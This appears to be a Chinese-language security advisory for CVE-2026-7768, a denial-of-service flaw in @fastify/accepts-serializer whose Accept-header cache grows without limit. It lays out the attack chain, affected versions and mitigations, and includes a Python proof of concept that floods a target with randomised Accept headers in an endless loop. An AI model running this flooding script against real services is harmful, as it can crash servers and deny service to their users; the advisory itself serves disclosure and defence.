CVE-2026-7768 CVSS 7.5 高危

CVE-2026-7768 fastify-accepts-serializer拒绝服务漏洞

披露日期: 2026-05-04

来源: ce714d77-add3-4f53-aff5-83d477b104bb

漏洞信息

漏洞编号

CVE-2026-7768

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

@fastify/accepts-serializer

漏洞概述

CVE-2026-7768 是 fastify-accepts-serializer 组件中的高危拒绝服务漏洞。由于该组件在缓存基于 Accept 头的序列化结果时缺乏大小限制，未经身份认证的远程攻击者可通过发送大量不同但匹配的 Accept 头变体，导致缓存无限增长。这将耗尽 Node.js 堆内存并致使服务进程崩溃。

技术细节

该漏洞源于 @fastify/accepts-serializer 组件在实现内容协商缓存机制时的设计缺陷。具体而言，该组件以 HTTP 请求的 Accept 头部作为键值，缓存序列化器的选择结果以提升性能。然而，开发者在实现时未对缓存的大小设置上限，也未引入适当的淘汰策略（如 LRU 算法）。攻击者可以利用这一缺陷，通过发送大量精心构造的 HTTP 请求，每个请求携带一个独特但在语义上仍能匹配有效序列化器的 Accept 头部（例如通过调整权重参数、添加无意义的空格或修改参数顺序）。由于缓存无界增长，Node.js 进程的堆内存将被迅速耗尽。当内存占用达到系统限制时，垃圾回收器无法释放足够的空间，最终导致进程因内存溢出（OOM）而崩溃，造成严重的拒绝服务。

攻击链分析

STEP 1

步骤1：侦察

攻击者识别出目标服务使用了易受攻击版本的 @fastify/accepts-serializer 组件。

STEP 2

步骤2：构造恶意请求

攻击者编写脚本，向目标服务器发送大量 HTTP 请求，每个请求的 Accept 头部包含随机生成的不同参数，但在语义上仍然匹配序列化器。

STEP 3

步骤3：资源耗尽

服务器端无限制地缓存每一个唯一的 Accept 头部条目，导致 Node.js 堆内存被迅速占用且无法释放。

STEP 4

步骤4：服务崩溃

当内存耗尽触发 OOM (Out of Memory) 时，Node.js 进程崩溃，导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import random
import string

target_url = "http://vulnerable-host:3000/"

# Function to generate random Accept headers to flood the cache
def generate_random_accept():
    base = "application/json"
    # Add random parameters to make the header unique but valid
    params = []
    for _ in range(random.randint(1, 5)):
        key = ''.join(random.choices(string.ascii_letters, k=4))
        val = random.random()
        params.append(f"{key}={val}")
    return f"{base}; {', '.join(params)}"

print("Starting DoS attack on CVE-2026-7768...")
try:
    while True:
        headers = {
            "Accept": generate_random_accept()
        }
        # Send request to trigger caching
        r = requests.get(target_url, headers=headers)
        print(f"Sent request with Accept: {headers['Accept']}")
except KeyboardInterrupt:
    print("Attack stopped.")

影响范围

@fastify/accepts-serializer <= 6.0.3

防御指南

临时缓解措施

如果暂时无法升级，建议在应用网关处对 Accept 请求头进行标准化处理或过滤，删除多余的参数。同时，严格监控 Node.js 进程的内存使用情况，配置内存告警和自动重启机制，以在发生攻击时尽快恢复服务。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表